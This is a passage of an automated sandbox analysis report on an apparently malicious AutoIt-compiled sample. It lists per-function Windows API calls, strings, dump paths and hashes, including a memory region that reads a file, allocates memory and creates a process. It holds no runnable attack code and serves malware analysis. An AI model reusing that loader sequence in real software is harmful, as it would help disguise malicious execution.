Part of subcall function 00ED3411: LoadIconW.USER32(000000A9), ref: 00ED34C2
Part of subcall function 00ED3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00ED34D1

Strings

AutoIt v3, xrefs: 00EE520B
0, xrefs: 00EE51FA
#, xrefs: 00EE5201

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 248394b1d3170b0d0d6806b8bde5b9f4091e77b5cf96ca355a329861e28beff9
Instruction ID: c10fe2894ad6be1d020277cfdfe1794d9b53c3902f53e018cdf03299bee8feae
Opcode Fuzzy Hash: 248394b1d3170b0d0d6806b8bde5b9f4091e77b5cf96ca355a329861e28beff9
Instruction Fuzzy Hash: F3215A71D2430CAFEB10AFA4ED09B9E7BB4FB08314F14015AF504A62A0D7B66950EF84

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00EE4E22
KillTimer.USER32(?,00000001), ref: 00EE4E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE4E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE4E7A
CreatePopupMenu.USER32 ref: 00EE4E8E
PostQuitMessage.USER32(00000000), ref: 00EE4EAF

Strings

TaskbarCreated, xrefs: 00EE4E75

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: be0dd4b8077f77357cc952e6c4f5cc2e00b3900659fd68e6f8ab70de90b71c46
Instruction ID: 7120cd7304264ee600d7d6258dae159911c71b6aa00df32169108e2afba121ee
Opcode Fuzzy Hash: be0dd4b8077f77357cc952e6c4f5cc2e00b3900659fd68e6f8ab70de90b71c46
Instruction Fuzzy Hash: 9D412BB122838EABEF156F25EC09BFA3695F741304F141526F502B92F2CF65AC50BB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EE56F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F20C5B

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

_memset.LIBCMT ref: 00EE5787
_wcscpy.LIBCMT ref: 00EE57DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE57EB
__swprintf.LIBCMT ref: 00F20CD1

Strings

Line %d: , xrefs: 00F20CCB
AutoIt - , xrefs: 00EE5760

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: ef14e6309705e9d30f0e6ec7b1d3cfc5dc0a06ad5c50d5cb85bcbdb608e981cd
Instruction ID: d33b1123dc0985179a196f40b61bc4f2a05ad05ab2e29e44141cea98098f59e9
Opcode Fuzzy Hash: ef14e6309705e9d30f0e6ec7b1d3cfc5dc0a06ad5c50d5cb85bcbdb608e981cd
Instruction Fuzzy Hash: BF41C472418348AAC325FB61DC45ADF77DCAF84364F100A1EF185A21A2EF74A648DB97

Uniqueness

Uniqueness Score: -1.00%

Function 03AF156B Relevance: 10.7, APIs: 7, Instructions: 192
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,00000000,7F91A078,00000000,7F951704,00000000,7FE1F1FB,00000000,7FE7F840,00000000), ref: 03AF1634
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000,00000040), ref: 03AF165E
ReadFile.KERNELBASE(00000000,00000000,00000000,7FAB7E30,00000000,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000), ref: 03AF1675
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000,00000040), ref: 03AF1699
FindCloseChangeNotification.KERNELBASE(00000000,03AF0C47,00000000,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000,00000040,?), ref: 03AF1709
VirtualFree.KERNELBASE(00000000,00000000,00008000,03AF0C47,00000000,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000), ref: 03AF1714
VirtualFree.KERNELBASE(03AF0C47,00000000,00008000,?,?,?,?,?,?,?,03AF1783,7FAB7E30,03AF1052,00000000,00000040,?), ref: 03AF175B

Memory Dump Source

Source File: 00000001.00000002.256622891.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3af0000_kmhbvf.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 8f45008f768d33d7bd127eaa78f521bf14de2d86f53a47dd627cbe435d6bc0e6
Instruction ID: a7dd3151770462d58584927d738558fe83d8f31745dcde8264f882ef16d0d1ae
Opcode Fuzzy Hash: 8f45008f768d33d7bd127eaa78f521bf14de2d86f53a47dd627cbe435d6bc0e6
Instruction Fuzzy Hash: 99518975E00319EFDB20DBE49D84BAEFBB8AF09714F14455AFA04FB281E77499018B64

Uniqueness

Uniqueness Score: -1.00%

Function 00EE50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 00EE5109
CreateWindowExW.USER32 ref: 00EE512A
ShowWindow.USER32(00000000), ref: 00EE513E
ShowWindow.USER32(00000000), ref: 00EE5147

Strings

edit, xrefs: 00EE5124
AutoIt v3, xrefs: 00EE5101, 00EE5106, 00EE5107

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 590b910d6493417af416396cc4f838d220e83eee83e252937439e7d32a026ef3
Instruction ID: 0ced58064dabbf37ad5bf6d340b5b225f635bd0a1f990326555077c00feef68d
Opcode Fuzzy Hash: 590b910d6493417af416396cc4f838d220e83eee83e252937439e7d32a026ef3
Instruction Fuzzy Hash: 00F0DA715653987EEB712727AC48E273E7DD7C7F50F10011AB900A21B1CAA51851EEB4

Uniqueness

Uniqueness Score: -1.00%

Function 03AF09CB Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03AF0BA7

Strings

D, xrefs: 03AF09FD

Memory Dump Source

Source File: 00000001.00000002.256622891.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3af0000_kmhbvf.jbxd

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: e1a5388ddbcfa06036bf0c0d56e2bfa4bfb3376804a9db030e461f196f90f276
Instruction ID: adc379f780fa815dc75ed046ce6c4a938523916952922e82573d42b22ba5b168
Opcode Fuzzy Hash: e1a5388ddbcfa06036bf0c0d56e2bfa4bfb3376804a9db030e461f196f90f276
Instruction Fuzzy Hash: B702C270D00209EFDB14DFD4C985BADBBB5BF08305F2441AAF655BA292D7749A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00EF563D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00EF569B
_memcpy_s.LIBCMT ref: 00EF570D
__read_nolock.LIBCMT ref: 00EF576B
__filbuf.LIBCMT ref: 00EF578E
_memset.LIBCMT ref: 00EF57D2

Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
Instruction ID: b8bf74a15f053feb7208fb1225c77308c218331c3affb4b1d68e929de8d80970
Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
Instruction Fuzzy Hash: 8251E832A00B0DDBCB249F69C8846BE77A5AF20324F24976AFB35F62D0D7709D509B40

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00ED1275,SwapMouseButtons,00000004,?), ref: 00ED12A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00ED1275,SwapMouseButtons,00000004,?), ref: 00ED12C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00ED1275,SwapMouseButtons,00000004,?), ref: 00ED12EB

Strings

Control Panel\Mouse, xrefs: 00ED12A6

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 66bccf081968673a56fb1d795343fa506af0f481d74e5c1dc89f361c17e6cd8b
Instruction ID: 7b94c6e87e85f830b0b05bcb6a79314470817e5b9b0991179b3c2d66aefc6316
Opcode Fuzzy Hash: 66bccf081968673a56fb1d795343fa506af0f481d74e5c1dc89f361c17e6cd8b
Instruction Fuzzy Hash: 3A115A71614208BFDB208FA5DC84EEFBBB8EF05744F1055AAF805E7220D6729E41A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00EE278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00EE49C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00EE27AF,?,00000001), ref: 00EE49F4

_free.LIBCMT ref: 00F1FB04
_free.LIBCMT ref: 00F1FB4B

Part of subcall function 00EE29BE: SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00EE2ADF

Strings

Bad directive syntax error, xrefs: 00F1FB33

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: b2e28e9364ab161caa8eb0f336c91aba771c416a6c0165320a6b0f2fe70a4836
Instruction ID: 57a57411e9c4e312f6a4b4952ed7adbc793fa67b38294403ac1b2ca5303745c2
Opcode Fuzzy Hash: b2e28e9364ab161caa8eb0f336c91aba771c416a6c0165320a6b0f2fe70a4836
Instruction Fuzzy Hash: 00919E7191025DAFCF04EFA5CC919EEB7B4BF04320F10456AF816BB2A1EB349A48DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EE31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F2032B
GetOpenFileNameW.COMDLG32(?), ref: 00F20375

Part of subcall function 00EF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE2A58,?,00008000), ref: 00EF02A4

Part of subcall function 00EF09C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EF09E4

Strings

X, xrefs: 00F20343

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: dda8ff0df831446307ecfe61c81a3dd46999bb3b55b9904d5341864bf0e7652e
Instruction ID: 8bc198274ff6317f346eed78669125c7ef3db511c8a28516ea1a4658499a647c
Opcode Fuzzy Hash: dda8ff0df831446307ecfe61c81a3dd46999bb3b55b9904d5341864bf0e7652e
Instruction Fuzzy Hash: 60218171A1029C9BDB41EFA5D845BEE7BF8AF49310F00405AE504B7242DBB55A88EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F4D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68dd16b105e4fe686ce51f55fb066a93e85395e696f16666b03c920de9704b70
Instruction ID: 5fba86f62fa1a4278673efcc12a34a7545565ff5f357cae993590e2643978615
Opcode Fuzzy Hash: 68dd16b105e4fe686ce51f55fb066a93e85395e696f16666b03c920de9704b70
Instruction Fuzzy Hash: A3F14CB1A083019FC714DF28C884A6ABBE5FF89314F14892EF8999B351D775E945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00EE38C0 Relevance: 4.7, APIs: 3, Instructions: 213fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EE39C3
ReadFile.KERNELBASE(00000000,?,00010000,00F60980,00000000,00000000,00000000,00000001,00EE3AAF,00008000,00F60980,?,00008000), ref: 00EE39E9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: bcc0f53f523e529fb680e2362dfcc9a86627c37d8e68e62ffcfd8d50d340fec5
Instruction ID: 15d15f7fcabfe6f250fd210f8b2f046aa8f44355248bd7d02eb121a5daba4edd
Opcode Fuzzy Hash: bcc0f53f523e529fb680e2362dfcc9a86627c37d8e68e62ffcfd8d50d340fec5
Instruction Fuzzy Hash: FB81E071A0425DEBDF00DF66D8887ADFBB0FF40300F148195E865AB28AD776DA60DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EDAB15 Relevance: 4.6, APIs: 3, Instructions: 126comCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EDAD08
OleInitialize.OLE32(00000000), ref: 00EDAD85

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HandleInitialize
String ID:
API String ID: 3139323997-0
Opcode ID: 7d3aeb23a4eda4cfb8e2f1248bf5eef240c5f7f90168a2f127f3fcb5cd521906
Instruction ID: f45d407dc574d964d9b7b17754fc34b55f82aac19913bbff1ee6c2b7281e9a19
Opcode Fuzzy Hash: 7d3aeb23a4eda4cfb8e2f1248bf5eef240c5f7f90168a2f127f3fcb5cd521906
Instruction Fuzzy Hash: 3C5196B082D389CEC799FF6EAD446597FE9EB58314714816BD018C72B2EB301405AF56

Uniqueness

Uniqueness Score: -1.00%

Function 00EE59D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EE59F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE5A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EE5ABB

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: a860e4e45315f750345a385a0e7ae8bb9a253238007e3e0f7ab6c9adeb69dde9
Instruction ID: f39a8f7024da8d0ac2b4738b99d14fd1d901d3bc7bef5d952b834193f60c023d
Opcode Fuzzy Hash: a860e4e45315f750345a385a0e7ae8bb9a253238007e3e0f7ab6c9adeb69dde9
Instruction Fuzzy Hash: C8319EB15157498FD720EF35D884697BBE8FB49308F000A3EF69A93241EB71A944DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EF593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00EF5953

Part of subcall function 00EFA39B: __NMSG_WRITE.LIBCMT ref: 00EFA3C2
Part of subcall function 00EFA39B: __NMSG_WRITE.LIBCMT ref: 00EFA3CC

__NMSG_WRITE.LIBCMT ref: 00EF595A

Part of subcall function 00EFA3F8: GetModuleFileNameW.KERNEL32(00000000,00F953BA,00000104,00000004,00000001,00EF1003), ref: 00EFA48A
Part of subcall function 00EFA3F8: ___crtMessageBoxW.LIBCMT ref: 00EFA538

Part of subcall function 00EF32CF: ___crtCorExitProcess.LIBCMT ref: 00EF32D5
Part of subcall function 00EF32CF: ExitProcess.KERNEL32 ref: 00EF32DE

Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58

RtlAllocateHeap.NTDLL(01270000,00000000,00000001,?,00000004,?,?,00EF1003,?), ref: 00EF597F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: e4ed85b9d7aa75bdfadf4eade14d4face5fc2b88bc632dde97b899620e823b5d
Instruction ID: b61dad51fc71f9a62a83ee80387103ed86cd4c5394cc0741b007dafca5fc474f
Opcode Fuzzy Hash: e4ed85b9d7aa75bdfadf4eade14d4face5fc2b88bc632dde97b899620e823b5d
Instruction Fuzzy Hash: C101D632301B0EDAE6192B34AC0167E32888FE2774F50202BF728BE191DEB08D004761

Uniqueness

Uniqueness Score: -1.00%

Function 00EE48B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EE48FA

Strings

EA06, xrefs: 00F208A1

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 038b983d4636b5cd02d263298dab3cb74ea3ed9df7ddd4054228fffd755c9080
Instruction ID: 5fe45ff5e23da180df22037f9e2f06eba1ebe54999063f775839c7f3eb05645a
Opcode Fuzzy Hash: 038b983d4636b5cd02d263298dab3cb74ea3ed9df7ddd4054228fffd755c9080
Instruction Fuzzy Hash: 1041ADA2E041EC5BDF219B6598517FF7FE18B85320F2450B4E882F72C7D6228D8093E2

Uniqueness

Uniqueness Score: -1.00%

Function 00EDAB1F Relevance: 3.1, APIs: 2, Instructions: 139comCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EDAD08
OleInitialize.OLE32(00000000), ref: 00EDAD85

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HandleInitialize
String ID:
API String ID: 3139323997-0
Opcode ID: ae7faa8f0228c79f44af9dff7abcfd4070449caacf7ca7d7a08dab368217fc1e
Instruction ID: 0996b0470ca7efddc680496d093615b503aee5127b74b967cc7055b60b5d7b01
Opcode Fuzzy Hash: ae7faa8f0228c79f44af9dff7abcfd4070449caacf7ca7d7a08dab368217fc1e
Instruction Fuzzy Hash: 556174B0829388CED795FF6EAD816557EE8EB5830471491ABD008C7273EB301405BF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00EE5F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

